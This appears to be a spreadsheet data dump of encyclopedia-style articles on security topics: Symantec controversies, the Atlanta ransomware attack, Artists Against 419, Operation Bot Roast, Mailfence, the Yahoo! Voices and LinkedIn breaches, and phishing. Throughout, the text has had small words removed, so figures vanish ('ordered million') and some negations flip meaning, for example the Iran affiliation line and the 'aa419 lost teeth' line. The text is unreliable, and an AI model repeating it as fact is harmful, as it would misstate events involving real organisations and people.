company rename current name. avira december 2020, nortonlifelock announced acquisition avira. acquisition closed january 2021. security concerns controversies restatement august 2004, company announced discovered error calculation deferred revenue, represented accumulated adjustment million. endpoint arrival year 2010 triggered symantec endpoint. symantec reported malware intrusion protection updates date greater december 2009, 11:59 [were] considered 'out date.'" company created distributed workaround issue. scan evasion vulnerability march 2010, reported symantec antivirus symantec client security prone vulnerability might allow attacker bypass on-demand virus scanning, permit malicious files escape detection. denial-of-service attack vulnerabilities january 2011, multiple vulnerabilities symantec products could exploited denial-of-service attack, thereby compromise system, reported. products involved symantec antivirus corporate edition server symantec system center.the november 2012 vulnerability bulletin united states computer emergency readiness team (us-cert) reported following vulnerability older versions symantec's antivirus system: "the decomposer engine symantec endpoint protection (sep) 11.0, symantec endpoint protection small business edition 12.0, symantec antivirus corporate edition (savce) 10.x, symantec scan engine (sse) 5.2.8 properly perform bounds checks contents archives, allows remote attackers cause denial service (application crash) possibly execute arbitrary code crafted file."the problem relates older versions systems patch available. us-cert rated seriousness vulnerability 10-point scale. "decomposer engine" component scanning system opens containers, compressed files, scanner evaluate files within. scareware lawsuit january 2012, james gross filed lawsuit symantec distributing fake scareware scanners purportedly alerted users issues computers. gross claimed scan, errors problems corrected, prompted scanner purchase symantec remove rest. gross claimed bought app, speed computer remove detected viruses. hired digital forensics expert back claim. symantec denied allegations said would contest case. symantec settled million fund million eligible customers representing overpaid amount app) case dismissed court. source code theft january 2012, symantec disclosed network hacked. hacker known "yama tough" obtained source code symantec software hacking indian government server. yama tough released parts code threatened release more. according chris paden, symantec spokesman, source code taken enterprise products five years old.on september 2012, affiliate hacker group anonymous published source code norton utilities. symantec confirmed part code stolen earlier, leak included code 2006 versions norton utilities, pcanywhere norton antivirus. verisign data breach february 2012, reported verisign's network data hacked repeatedly 2010, breaches disclosed publicly noted filing october 2011. verisign provide information whether breach included certificate authority business, acquired symantec late 2010. oliver lavery, director security research ncircle, asked rhetorically, "can trust site using verisign certificates? without clarity, logical answer no." pcanywhere exploit february 2012, details exploit pcanywhere posted. exploit would allow attackers crash pcanywhere computers running windows. symantec released hotfix issue twelve days later. hacking york times network according mandiant, symantec security products used york times detected pieces malware installed chinese hackers newspaper's network three months late 2012. symantec responded: "advanced attacks like ones york times described following article, &lt;http://nyti.ms/tztr5z&gt;, underscore important companies, countries consumers make sure using full capability security solutions. advanced capabilities [e]ndpoint offerings, including unique reputation-based technology behavior-based blocking, specifically target sophisticated attacks. turning signature-based anti-virus components [e]ndpoint solutions alone [is] enough world changing daily attacks threats. encourage customers aggressive deploying solutions offer combined approach security. anti-virus software alone enough". intellectual ventures suit february 2015, symantec found guilty counts patent infringement suit intellectual ventures ordered million compensation damages, september 2016, decision reversed appeal federal circuit. sustaining digital certificate security september 2015, google notified symantec latter issued test certificates five organizations, including google opera, without domain owners' knowledge. symantec performed another audit announced additional test certificates mis-issued domains 2,458 test certificates mis-issued domains never registered. google requested symantec update public incident report proven analysis explaining details failures.the company asked report certificates issued certificate transparency henceforth. symantec since reported implementing certificate transparency certificates. above all, google insisted symantec execute security audit third party maintain tamper-proof security audit logs. google symantec clash website security checks march 2017, google stated lost confidence symantec, latest incident improper certificate issuance. google says millions existing symantec certificates become untrusted google chrome next months. according google, symantec partners issued least 30,000 certificates questionable validity several years, symantec disputes number. google said symantec failed comply industry standards could provide audits showing necessary documentation.google's ryan sleevi said symantec partnered (crosscert (korea electronic certificate authority), certisign certificatadora digital, certsuperior c.v., certisur s.a.) follow proper verification procedures leading misissuance certificates.following discussions google required symantec migrate symantec-branded certificate issuance operations non-symantec-operated “managed partner infrastructure”, deal announced whereby digicert acquired symantec's website security business. september 2017, google announced starting chrome "chrome remove trust symantec-issued certificates issued prior june 2016". google stated december 2017, symantec transition issuance operation publicly-trusted certificates digicert infrastructure, certificates issued symantec infrastructure date trusted chrome." google predicted toward october, 2018, release chrome browser would omit trust symantec's infrastructure certificates issued, affecting certificates chaining symantec roots. mozilla firefox planned distrust symantec-issued certificates firefox (released october 2018), delivered change firefox (released december 2018). apple also planned distrust symantec root certificates. subsequently, symantec exited tls/ssl segment selling unit digicert $950 million 2017. columbia patent-infringement lawsuit 2022, columbia university $185 million judgement nortonlifelock inc. patent-infringement lawsuit. jury found norton willfully infringed patents related antivirus fighting malware. also comparison antivirus software comparison computer viruses huawei symantec, joint venture huawei symantec blocking united kingdom technologies symantec behavior analysis technologies sonar antibot symantec online backup references external links official website business data nortonlifelock:</t>
  </si>
  <si>
    <t>All Things Vice</t>
  </si>
  <si>
    <t>things vice blog started 2012 australian author journalist eileen ormsby news dark web. since investigations silk road 2013, darknet market blog various happenings dark publish books, silk road (2014) darkest (2018).ormsby former australian lawyer living melbourne. sought comment, ormsby written, interviewed cited dark web, scams, bitcoin darknet market issues. obtained number exclusive interviews individuals involved dark web. cited trial drug dealer paul leslie howard discovered silk road market reading coverage site. also regularly writes scripts casefile true crime podcast, including dark web. references external links official website</t>
  </si>
  <si>
    <t>Atlanta government ransomware attack</t>
  </si>
  <si>
    <t>city atlanta, georgia subject ransomware attack began march 2018. city recognized attack thursday, march 2018, publicly acknowledged ransomware attack. atlanta's national importance transportation economic hub, attack received wide attention notable extent duration service outages caused. many city services programs affected attack, including utility, parking, court services. city officials forced complete paper forms hand.on november grand jury indicted iranian hackers, faramarz shahi savandi mohammad mehdi shah mansouri, attack. department justice alleged savandi mansouri part samsam group; samsam group based iran; pair created samsam ransomware, malware used attack. there affiliations government iran. approach attack leading attack, atlanta government criticized lack spending upgrading infrastructure, leaving multiple vulnerabilities open attack. fact, january 2018 audit found 1,500 2,000 vulnerabilities city's systems, suggested number vulnerabilities grown large workers grew complacent. virus used attack city samsam ransomware, differs ransomware rely phishing, rather utilizes brute-force attack guess weak passwords match found. known target weaker infrastructures servers. ransomware prominently behind attacks medical government organizations since discovery 2016, previous attacks targets ranging small towns farmington, mexico colorado department transportation erie county medical center. also bypass antivirus software. despite suspects identified indicted november 2018, samsam hackers described "opportunistic".on march 5:40 department atlanta information management first learned outages various internal customer applications “including applications customers bills access court related information,” according richard cox, city's interim chief operations. soon afterward, city shut many digital services attempt control situation, including court system database wi-fi hartsfield–jackson atlanta international airport. city eventually identified ransomware attack. aftermath recovery efforts this hack notable largest successful breach security major american city ransomware, potentially affecting million people. following attack, city atlanta cooperated fbi, department homeland security, secret service hired security firms secureworks investigate, many government computers advised stay powered days later.though city declared little evidence personal data compromised, later studies show breach worse originally estimated. june 2018, estimated third software programs used city remained offline partially disabled. addition, many legal documents police dashcam video files permanently deleted, though police department able restore access investigation files. while, residents forced bills forms paper.in response hack, atlanta devoted $2.7 million contractors order recover, later estimated would need $9.5 million.on november 2018, department justice indicted iranian hackers attack, charging faramarz shahi savandi mohammad mehdi shah mansouri part samsam group created samsam ransomware. references</t>
  </si>
  <si>
    <t>Artists Against 419</t>
  </si>
  <si>
    <t>artists against (commonly abbreviated aa419) internet consumer protection group dedicated identifying shutting scam websites. volunteers seek stop, disrupt hinder fraudsters' activities cataloging reporting fraudulent domains. history artists against site october 2003 began tackling fraudulent websites artistic way: hotlinking images drain small bandwidth allowance monthly limit. over time fraudulent sites evolved artists. november 2003, artists against hosted first international flash-mobsee below. there many subsequent mobbings designed make internet hosting service providers aware artists against would tolerate hosters knowingly hosting websites aa419 evidence show criminal. time, started list allegedly fraudulent sites members found database. with database entries, potential scam victim search website sent possible fraudster, victim might database entry anti-fraud site inclined cease contact scammer. this list contains nearly 100,000 websites august 2014), world's largest databases fraudulent websites. sophisticated tools techniques used search fake sites domains. when sufficient evidence prove particular domain fraudulent, entered database select experienced member careful review. aa419's members compose abuse reports domain registrar and/or hosting service provider evidence review/suspend fraudulent site. frequently, fake sites closed within days even hours metropolitan police force previously worked aa419. aa419 also escalates websites found linked south africa south african police service (saps) websites reported giving authorities chance investigate. aa419 maintains constant relations numerous internet registrars hosting companies, wish host criminal activity cooperate willingly suspending fraudulent sites evidence presented. however, certain companies fail respond aa419's abuse reports. circumstances past) arranged virtual sit-ins. flash-mobbing aa419 described past actions flash-mobbing, actuality, activity called virtual sit-in. virtual sit-ins entail large numbers individuals intently visiting target site downloading pages requesting large numbers information, intent requests cause rapid drain bandwidth, bandwidth quota goes offline. example, people continuously download kilobyte image simultaneously hours, uses gigabytes allocated bandwidth. assuming fraudulent site allocated bandwidth month, automatically shut hours, bandwidth threshold exceeded. fraudulent website remain off-line following month, bandwidth quota reset. virtual sit-ins achieved using freeware tools muguito vampire. computer flash-mob similar case sites' sudden popularity brings unexpected large numbers visitors server unable handle. difference that, virtual sit-in, actual audience action designed disruptive. cases, particularly small web-hosting company involved, volume traffic large access slowed sites server. this would hold hoster ransom scam site suspended; hosting service would resume operating normally afterwards. important note site ever "mobbed" least letters sent hosting company notifying abuse, informing hosting fraudulent site, detailing evidence fraudulent activities requesting site shut violating hosting provider's terms service. artists always preferred hosting companies take responsibility actions clients well content sites. virtual sit-in tool last resort, used attempts shut fraudsters' website failed. fortunately, vast majority web-hosting companies find activities internet fraudsters highly objectionable swiftly intervene stop them. controversy what aa419 describes flash-mobbing, considered others illegal electronic offensive called distributed denial-of-service attack (ddos). admission affect "all sites server", attacked systems without checking bandwidth limits place. legal scholars like susan brenner, professor expert cybercrime university dayton school law, sympathetic aa419's aims supportive peaceable efforts, find aggressive techniques akin attacks, illegal. many jurisdictions prohibit anyone sending command another computer intent causing harm, doses definitely damage. change direction following aa419 site, discussing discontinuation vampire software site: september 14th 2007 artists against discontinued bandwidth hogging toolsas regular viewers noticed, artists discontinued deadly duo, mugito vampire september 2007.as community grown sophisticated effective shutting fake sites words alone. database largest kind, expertise identifying, cataloging, terminating fraud sites unmatched. shut fakes database letter-writing establishing good relationships hosts domain registrars, believe time move on.we listened feedback sections internet, realize less need tools. with many reputable hosting companies supporting work aa419, longer need pressure tactics worked infancy.this aa419 lost teeth. remain committed locating, closing fakes sites descriptions. continue make known names hosts registrars support fakes within ranges, bring reputation, artists every fight. subsequent activities since announced change direction, artists against developed legal techniques acquired numerous members find fraudulent websites. artists against also long-standing partnership prominent scambaiting community 419eater allowed members organisation upload, moderation, websites database fraudulent websites. 2020 support withdrawn.aa419 constantly developing building relationships domain registrars, hosting companies various security vendors groups long term anti phishing working group member. because this, even though fraudulent sites found now, limited number private sector companies supported aa419's efforts. using responsive tactics artists against become effective method operating. additional relationships also since established credible anti-fraud source groups scamsurvivors, forum scambaiter-deutschland romancescambaiter artists against 419's database warn verified malicious domains websites. artists considerable success closing fraudulent websites. 156,000 sites listed database, roughly 4500 currently active, many recent additions. active status aa419 database specific definition, domain considered still malicious control.since january 2016, artists against database also reflects separate scam category, autonomous system number (asn) domain name registrar fields, enabling isps registrars easily determine sites responsibility listed. additional comments field also added showing additional details contact details scam website used, refinement scam category, links partner websites, trusted informational/alert links related database entries. project field added allowing related entries easily identified. this used alert active threats specific sectors. example seen petsplace website consumers south africa alerted known active scam websites.on december 2019, artists against also announced krampus program whereby information cyber threats captured artists against shared security groups.since december 2020, artists against also started displaying three domain name registrars, autonomous system numbers (asn) internet protocol addresses addresses) database page detailed areas badness available separate page chart. references external links official website artists against forum artists against scam website database legal affairs: vigilante kitchen</t>
  </si>
  <si>
    <t>Operation: Bot Roast</t>
  </si>
  <si>
    <t>operation: roast operation track herders, crackers, virus coders install malicious software computers internet without owners' knowledge, turns computer zombie computer sends spam computers compromised computer, making botnet network infected computers. operation launched vast scale botnet resources poses threat national security.the operation created disrupt disassemble herders. june 2007, identified million computers compromised, leading arrest persons responsible creating malware. process, owners infected computers notified, many unaware exploitation.some early results operation include charges following: robert alan soloway seattle, washington, pleaded guilty charges using botnets send tens millions spam messages touting website. jeanson james ancheta pleaded guilty controlling thousands infected computers. jason michael downey (known "nessun"), founder network rizon, charged using botnets disable systems. akbot author owen walker (known "akill") zealand, tried various crimes discharged prosecution 2008. references</t>
  </si>
  <si>
    <t>Mailfence</t>
  </si>
  <si>
    <t>mailfence encrypted email service offers openpgp based end-to-end encryption digital signatures. launched november 2013 contactoffice group, operating online collaboration suite universities organizations since 1999. history development midst 2013, mailfence project started founders contactoffice. march 2016, beta version end-to-end encryption digital signatures emails released. january 2021, mailfence released progressive application mobile devices. block russia march 2020, mailfence reported smtp servers blocked russian based email services. this response refusal submit notice commencement collaboration roskomnadzor’s (the federal supervision agency communications, information technology, mass communication) russian government. mailfence respond request, citing obligation provide information users, violating terms federal belgian laws. features mailfence provides secure email features, functions calendar, contacts, documents collaboration. encryption two-factor authentication available free version product. most features available paid subscriptions start 2,50 month. email service supports pop/imap exchange activesync well vanity domains spf, dkim, dmarc catch-all address support. users send plain rich text emails, organize messages folders and/or categorize tags, take notes setting comment message create default message signatures every sender address. different identities also managed using aliases filters incoming emails. contacts contacts support (csv, vcard, ldif) import, (vcard, pdf) export accessed using carddav. users organize tags also create contact lists. calendar calendar supports vcal/ical import, export accessed using caldav. users share calendars group members also create polls. documents documents accessed using webdav edited online. users drag drop files folders, categorize tags take notes setting comment file. groups groups allow users share mailboxes, documents, contacts, calendars perform instant chatting group members secure way. group administrator manages access rights group members also another group member co-admin main admin group. polls mailfence polls secure meeting scheduler. chat jabber/xmpp protocol base mailfence chat functionality. first named jabber, xmpp (extensible messaging presence protocol), open-source protocol created instant messaging. web-based clients web-interface comes embedded imap, pop3, caldav, webdav client. users external accounts manage centrally web-interface. user management account owners create manage user accounts using admin console. server location since servers located belgium, legally outside jurisdiction. mailfence therefore subjected orders nsls, notwithstanding extradition treaties under belgian law, national international surveillance requests must belgian court. security privacy aside conventional security privacy features including managing access generating specific password non-web services, two-factor authentication, spam protection alongside plus addressing, sender address blacklist whitelist, mailfence offers following features: transport security service uses ephemeral exchange encrypt internet traffic users mailfence servers. hsts, mta-sts dane standards also supported. end-to-end encryption service uses open-source implementation openpgp (rfc 4880) emails. openpgp keypair generated client-browser, encrypted (via aes256) user's passphrase, stored mailfence server. server never sees user's openpgp keypair passphrase. service also supports end-to-end encryption emails using shared password possibility message expiration. openpgp signatures service gives choice "signing", "signing encrypting" email message without attachments. integrated keystore service provides integrated keystore manage openpgp keys, require third-party add-on/plugin. openpgp keypairs generated, imported exported. public keys users imported file in-line text also downloaded openpgp directory public servers. full openpgp interoperability users communicate openpgp compatible service provider. warrant canary transparency report service maintains up-to-date transparency report warrant canary. also comparison mail servers comparison webmail providers references external links official website</t>
  </si>
  <si>
    <t>2012 Yahoo! Voices hack</t>
  </si>
  <si>
    <t>yahoo! voices, formerly associated content, hacked july 2012. hack supposed leaked approximately half million email addresses passwords associated yahoo! contributor network. suspected hacker group, d33ds, used method injection penetrate yahoo! voice servers. security experts said passwords encrypted website https protocol, major reasons data breach. email addresses passwords still available download plaintext file hacker's website. hacker group described hack "wake-up call" yahoo! security experts. joseph bonneau, security researcher former product analysis manager yahoo, said "yahoo fairly criticized case integrating associated content accounts quickly general yahoo login system, tell password protection much stronger." reaction communities users d33ds, suspected hacker group, said hack "wake-up call". they said threat yahoo!, inc. security firm trustedsec.net said passwords contained number email addresses gmail, aol, yahoo, websites. response yahoo immediately hack, yahoo!, written statement, apologized breach. yahoo! disclose many passwords valid hack, said every minute, passwords changed site. yahoo! said passwords stolen hack. hackers' website, d33ds.co, available later thursday, hack. yahoo! said written statement takes security seriously working together vulnerability site. yahoo! said process changing passwords hacked accounts notifying companies hack. controversy simple matter sparked controversy yahoo!. controversy sparked yahoo!'s silence data breach. after servers hacked, yahoo! mail affected victims, although promised earlier. there site-wide notifications hack, victim type personal messages detailing reset account passwords yahoo. references external links http://ycorpblog.com/2012/07/13/yahoo-0713201/ archived 2012-08-04 wayback machine</t>
  </si>
  <si>
    <t>2012 LinkedIn hack</t>
  </si>
  <si>
    <t>2012 linkedin hack refers computer hacking linkedin june 2012. passwords nearly million user accounts stolen. yevgeniy nikulin convicted crime sentenced months prison. owners hacked accounts unable access accounts. linkedin said, official statement, would email members instructions could reset passwords. 2016, linkedin discovered additional million email addresses passwords compromised 2012 breach. history hack social networking website linkedin hacked june 2012, passwords nearly million user accounts stolen russian cybercriminals. owners hacked accounts longer able access accounts, website repeatedly encouraged users change passwords incident. vicente silveira, director linkedin, confirmed, behalf company, website hacked official blog. also said holders compromised accounts would find passwords longer valid website.in 2016, linkedin discovered additional million email addresses hashed passwords claimed additional data 2012 breach. response, linkedin invalidated passwords users changed passwords since 2012. leak collection containing data million users, believed scraped linkedin, leaked online september, 2021 form torrent file hackers previously tried sell earlier june, 2021. reaction internet security experts said passwords easy unscramble linkedin's failure salt hashing them, considered insecure practice allows attackers quickly reverse scrambling process using existing standard rainbow tables, pre-made lists matching scrambled unscrambled passwords. another issue sparked controversy provided linkedin, grabs personal names, emails, notes mobile calendar without user's approval. security experts working skycure security said application collects user's personal data sends linkedin server. linkedin claimed permission feature user-granted, information sent securely using secure sockets layer (ssl) protocol. company added never stored shared information third party.rep. mary bono mack united states congress commented incident, "how many times going happen congress finally wakes takes action? this latest incident brings sharp focus need pass data protection legislation." senator patrick leahy said, "reports another major data breach give pause american consumers who, ever, share sensitive personal information online transactions networking congress make comprehensive data privacy cybercrime legislation priority."marcus carey, security researcher rapid7, said hackers penetrated databases linkedin preceding days. expressed concerns access website even attack. michael aronowitz, vice president saveology said, "everyday hundreds sites hacked personal information obtained. stealing login information account easily used access accounts, hold personal financial information." security experts indicated stolen passwords encrypted fairly easy decrypt, reasons data breach.katie szpyrka, long time user linkedin illinois, united states, filed million lawsuit linkedin, complaining company keep promises secure connections databases. erin o’harra, spokeswoman working linkedin, asked lawsuit, said lawyers looking take advantage situation propose bills sopa pipa united states congress.an amended complaint filed nov. 2012 behalf szpyrka another premium linkedin user virginia, united states, named khalilah gilmore–wright, class representatives linkedin users affected breach. lawsuit sought injunctive equitable relief, well restitution damages plaintiffs members class. response linkedin linkedin apologized immediately data breach asked users immediately change passwords. federal bureau investigation assisted linkedin corporation investigating theft. june 2012, investigation still early stages, company said unable determine whether hackers also able steal email addresses associated compromised user accounts well. linkedin said users whose passwords compromised would unable access linkedin accounts using passwords. arrest conviction suspect october 2016, russian hacker yevgeniy nikulin detained czech police prague. united states requested interpol warrant him.a united states grand jury indicted nikulin three unnamed co-conspirators charges aggravated identity theft computer intrusion. prosecutors alleged nikulin stole linkedin employee's username password, using gain access corporation's network. nikulin also accused hacking dropbox formspring, allegedly conspiring sell stolen formspring customer data, including usernames, e-mail addresses, passwords.nikulin convicted sentenced months imprisonment. references</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>phishing type social engineering attacker sends fraudulent (e.g., spoofed, fake, otherwise deceptive) message designed trick person revealing sensitive information attacker deploy malicious software victim's infrastructure like ransomware. phishing attacks become increasingly sophisticated often transparently mirror site targeted, allowing attacker observe everything victim navigating site, transverse additional security boundaries victim. 2020, phishing common attack performed cybercriminals, fbi's internet crime complaint centre recording twice many incidents phishing type computer crime.the first recorded term "phishing" cracking toolkit aohell created koceilah rekouche 1995; however, possible term used print edition hacker magazine 2600. word leetspeak variant fishing, probably influenced phreaking, alludes increasingly sophisticated lures "fish" users' sensitive information.attempts prevent mitigate impact phishing incidents include legislation, user training, public awareness, technical security measures. phishing awareness become important home work place. instance, 2017 2020, phishing attacks increased among businesses. types email phishing most phishing messages delivered email spam, personalized targeted specific individual company–this termed "bulk" phishing. content bulk phishing message varies widely depending goal attacker–common targets impersonation include banks financial services, email cloud productivity providers, streaming services. attackers credentials obtained directly steal money victim, although compromised accounts often used instead jumping-off point perform attacks, theft proprietary information, installation malware, spear phishing people within target's organization. compromised streaming service accounts usually sold directly consumers darknet markets. spear phishing spear phishing involves attacker directly targeting specific organization person tailored phishing communications. this essentially creation sending emails particular person make person think email legitimate. contrast bulk phishing, spear phishing attackers often gather personal information target increase probability success attack. spear phishing typically targets executives work financial departments access organization's sensitive financial data services. 2019 study showed accountancy audit firms frequent targets spear phishing owing employees' access information could valuable criminals.threat group-4127 (fancy bear) used spear phishing tactics target email accounts linked hillary clinton's 2016 presidential campaign. they attacked 1,800 google accounts implemented accounts-google.com domain threaten targeted users.a recent study tested susceptibility certain groups spear fishing. total, young older users received, without knowledge, daily simulated phishing emails days. browser plugin recorded clicking links emails indicator susceptibility. forty-three percent users fell simulated phishing emails, older women showing highest susceptibility. while susceptibility young users declined across study, susceptibility older users remained stable. whaling fraud whaling refers spear phishing attacks directed specifically senior executives high-profile targets. content likely crafted interest person role targeted subpoena customer complaint.ceo fraud effectively opposite whaling; involves crafting spoofed emails purportedly senior executives intention getting employees organization perform specific action, usually wiring money offshore account. while fraud reasonably success rate, criminals gain large sums money attempts succeed. there multiple instances organizations losing tens millions dollars attacks. clone phishing clone phishing type phishing attack whereby legitimate, previously delivered email containing attachment link content recipient address(es) taken used create almost identical cloned email. attachment link within email replaced malicious version sent email address spoofed appear come original sender. claim resend original updated version original. typically requires either sender recipient previously hacked malicious third party obtain legitimate email. voice phishing voice phishing, vishing, telephony (often voice telephony) conduct phishing attacks. attackers dial large quantity telephone numbers play automated recordings often made using text-to-speech synthesizers make false claims fraudulent activity victim's bank accounts credit cards. calling phone number spoofed show real number bank institution impersonated. victim directed call number controlled attackers, either automatically prompt enter sensitive information order "resolve" supposed fraud, connect live person attempt social engineering obtain information. voice phishing capitalizes lower awareness among general public techniques caller spoofing automated dialing, compared equivalents email phishing, thereby inherent trust many people voice telephony. phishing phishing smishing conceptually similar email phishing, except attackers cell phone text messages deliver "bait". smishing attacks typically invite user click link, call phone number, contact email address provided attacker message. victim invited provide private data; often, credentials websites services. furthermore, nature mobile browsers, urls fully displayed; make difficult identify illegitimate logon page. mobile phone market saturated smartphones fast internet connectivity, malicious link sent yield result would sent email. smishing messages come telephone numbers strange unexpected format. page hijacking page hijacking involves compromising legitimate pages order redirect users malicious website exploit cross site scripting. hacker compromise website insert exploit mpack order compromise legitimate users visit compromised server. simplest forms page hijacking involves altering webpage contain malicious inline frame allow exploit load. page hijacking frequently used tandem watering hole attack corporate entities order compromise targets. calendar phishing calendar phishing phishing links delivered calendar invitations. calendar invitations sent, default, automatically added many calendars. these invitations often take form rsvp common event requests. former google click fraud czar shuman ghosemajumder believes form fraud increasing, recommends changing calendar settings automatically invitations. techniques link manipulation most types phishing form technical deception designed make link email appear belong organization attackers impersonating. misspelled urls subdomains common tricks used phishers. following example url, http://www.yourbank.example.com/, appear untrained though take user example section yourbank website; actually points "yourbank" (i.e. phishing) section example website. another common trick make displayed text link suggest reliable destination, link actually goes phishers' site. many desktop email clients browsers show link's target status hovering mouse this behavior, however, circumstances overridden phisher. equivalent mobile apps generally preview feature.internationalized domain names (idns) exploited spoofing homograph attacks, create addresses visually identical legitimate site, lead instead malicious version. phishers taken advantage similar risk, using open redirectors websites trusted organizations disguise malicious urls trusted domain. even digital certificates solve problem quite possible phisher purchase valid certificate subsequently change content spoof genuine website, host phish site without all. filter evasion phishers sometimes used images instead text make harder anti-phishing filters detect text commonly used phishing emails. response, sophisticated anti-phishing filters able recover hidden text images using optical character recognition (ocr). social engineering most types phishing involve kind social engineering, users psychologically manipulated performing action clicking link, opening attachment, divulging confidential information. addition obvious impersonation trusted entity, phishing involves creation sense urgency attackers claim accounts shut seized unless victim takes action. this occurs often victims bank insurance accounts.an alternative technique impersonation-based phishing fake news articles designed provoke outrage, causing victim click link without properly considering could lead. these links designed take professional looking website looks exactly like legitimate organization's website. once attacker's website, victims presented imitation "virus" notifications redirected pages attempt exploit browser vulnerabilities install malware. history 1980s phishing technique described detail paper presentation delivered 1987 international users group, interex. 1990s term "phishing" said coined well known spammer hacker mid-90s, khan smith. first recorded mention term found hacking tool aohell (according creator), included function attempting steal passwords financial details america online users. early phishing phishing closely associated warez community exchanged unlicensed software black hacking scene perpetrated credit card fraud online crimes. enforcement would detect words used chat rooms suspend accounts individuals involved counterfeiting software trading stolen accounts. term used "&lt;&gt;&lt;" single common html found chat transcripts naturally, could detected filtered staff. symbol replaced wording referred stolen credit cards, accounts, illegal activity. since symbol looked like fish, popularity phreaking adapted "phishing". aohell, released early 1995, program designed hack users allowing attacker pose staff member, send instant message potential victim, asking reveal password. order lure victim giving sensitive information, message might include imperatives "verify account" "confirm billing information".once victim revealed password, attacker could access victim's account fraudulent purposes. both phishing warezing generally required custom-written programs, aohell. phishing became prevalent added line instant messages stating: working password billing information". user using account account simultaneously could phish members relative impunity internet accounts could used non-aol internet members could actioned (i.e., reported department disciplinary action).. late 1995, crackers resorted phishing legitimate accounts brought measures late 1995 prevent using fake, algorithmically generated credit card numbers open accounts. eventually, aol's policy enforcement forced copyright infringement servers, promptly deactivates accounts involved phishing, often victims could respond. shutting warez scene caused phishers leave service. 2000s 2001 first known direct attempt payment system affected e-gold june 2001, followed "post-9/11 check" shortly september attacks world trade center. 2003 first known phishing attack retail bank reported banker september 2003. 2004 estimated 2004 2005, approximately million computer users united states suffered losses caused phishing, totaling approximately us$929 million. united states businesses lose estimated us$2 billion year clients become victims. phishing recognized fully organized part black market. specializations emerged global scale provided phishing software payment (thereby outsourcing risk), assembled implemented phishing campaigns organized gangs. 2005 united kingdom losses banking fraud—mostly phishing—almost doubled gb£23.2m 2005, gb£12.2m 2004, computer users claimed lost phishing 2005. 2006 almost half phishing thefts 2006 committed groups operating russian business network based petersburg. banks dispute customers phishing losses. stance adopted banking body apacs "customers must also take sensible precautions vulnerable criminal." similarly, first spate phishing attacks irish republic's banking sector september 2006, bank ireland initially refused cover losses suffered customers, although losses tune €113,000 made good. phishers targeting customers banks online payment services. emails, supposedly internal revenue service, used glean sensitive data u.s. taxpayers. while first examples sent indiscriminately expectation would received customers given bank service, recent research shown phishers principle able determine banks potential victims use, target bogus emails accordingly. social networking sites prime target phishing, since personal details sites used identity theft; late 2006 computer worm took pages myspace altered links direct surfers websites designed steal login details. 2007 million adults lost us$3.2 billion months ending august 2007. microsoft claims estimates grossly exaggerated puts annual phishing loss us$60 million. attackers broke ameritrade's database took million email addresses (though able obtain social security numbers, account numbers, names, addresses, dates birth, phone numbers trading activity) also wanted account usernames passwords, launched follow-up spear phishing attack. 2008 rapidshare file sharing site targeted phishing obtain premium account, removes speed caps downloads, auto-removal uploads, waits downloads, cool times uploads. cryptocurrencies bitcoin facilitate sale malicious software, making transactions secure anonymous. 2009 january 2009, phishing attack resulted unauthorized wire transfers us$1.9 million experi-metal's online banking accounts. third quarter 2009, anti-phishing working group reported receiving 115,370 phishing email reports consumers china hosting phishing pages each. 2010s 2011 march 2011, internal staff successfully phished, leading master keys secureid security tokens stolen, subsequently used break defense suppliers. chinese phishing campaigns targeted gmail accounts highly ranked officials united states south korean governments militaries, well chinese political activists. 2012 according ghosh, "445,004 attacks 2012 compared 258,461 2011 187,203 2010”. 2013 august 2013, advertising service outbrain suffered spear-phishing attack placed redirects websites washington post, time, cnn. october 2013, emails purporting american express sent unknown number recipients. november 2013, million customer credit card records stolen target customers, phished subcontractor account. security staff subsequently fired. december 2013, cryptolocker ransomware infected 250,000 computers. according dell secureworks, 0.4% infected likely agreed ransom demand. 2014 january 2014, seculert research identified targeted attack used xtreme rat. this attack used spear phishing emails target israeli organizations deploy piece advanced malware. fifteen machines compromised including ones belonging civil administration judea samaria. august 2014, icloud leaks celebrity photos found based phishing e-mails sent victims looked like came apple google, warning victims accounts might compromised asking account details. november 2014, phishing attacks icann gained administrative access centralized zone data system; also gained data users system access icann's public governmental advisory committee wiki, blog, whois information portal. 2015 charles eccleston plead guilty attempted spear-phishing attempted infect computers department energy employees. eliot higgins journalists associated bellingcat, group researching shoot malaysia airlines flight ukraine, targeted numerous spear phishing emails. august 2015, cozy bear linked spear-phishing cyber-attack pentagon email system causing shut entire joint staff unclassified email system internet access investigation. august 2015, fancy bear used zero-day exploit java, spear phishing attack spoofing electronic frontier foundation launching attacks white house nato. 2016 february, austrian aerospace firm facc defrauded million euros ($47 million) attack subsequently fired ceo.fancy bear carried spear phishing attacks email addresses associated democratic national committee first quarter 2016. wichita eagle reported employees fall victim phishing scam, lose paychecks" fancy bear suspected behind spear phishing attack august 2016 members bundestag multiple political parties linken-faction leader sahra wagenknecht, junge union saarland. august 2016, world anti-doping agency reported receipt phishing emails sent users database claiming official wada, consistent russian hacking group fancy bear. according wada, data hackers released forged. within hours 2016 u.s. election results, russian hackers sent emails spoofed harvard university email addresses, using techniques similar phishing publish fake news targeted ordinary american voters. 2017 2017, organizations experienced phishing attacks. nearly half information security professionals surveyed said rate attacks increased 2016. first half 2017 businesses residents qatar 93,570 phishing events three-month span. phishing email google facebook users successfully induced employees wiring money extent us$100 million overseas bank accounts control hacker. since arrested department justice. august 2017, customers amazon faced amazon prime phishing attack, hackers sent seemingly legitimate deals customers amazon. when amazon's customers attempted make purchases using "deals", transaction would completed, prompting retailer's customers input data could compromised stolen. 2018 2018, company block.one, developed eos.io blockchain, attacked phishing group sent phishing emails customers, aimed intercepting user's cryptocurrency wallet key; later attack targeted airdrop tokens. 2019 between 2019 october 2019 unauthorized individual gained access employee email accounts golden entertainment, vegas, nevada slot machine operator using email phishing attack. attacker access particular email attachment containing social security numbers, passport numbers, government ids, various personal data multiple company employees vendors. unclear whether information exposed. company notified affected individuals precaution, offering complimentary credit report monitoring. subsequently, class action lawsuit company approved united states district court district nevada december 2020. from 2015-2019, unatrac holding ltd. subjected ongoing spear phishing attack, costing million dollars. obinwanne okeke conspirators first acquired company cfo's email credentials. then, sent fake invoices wire transfer requests company's financial department. okeke perpetrated cyberfraud many businesses individuals, successfully capturing email sensitive login credentials. february 2021, sentenced years prison. 2020s 2020 july 2020, twitter suffered breach combined elements social engineering (security) phishing. 17-year hacker accomplices setup fake website resembling twitter's internal provider used remote working employees. individuals posing helpdesk staff called multiple twitter employees, directing submit credentials fake website. using details supplied unknowing employees, able seize control several high-profile user accounts, including barack obama, elon musk, biden apple inc.'s company account. hackers sent messages twitter followers 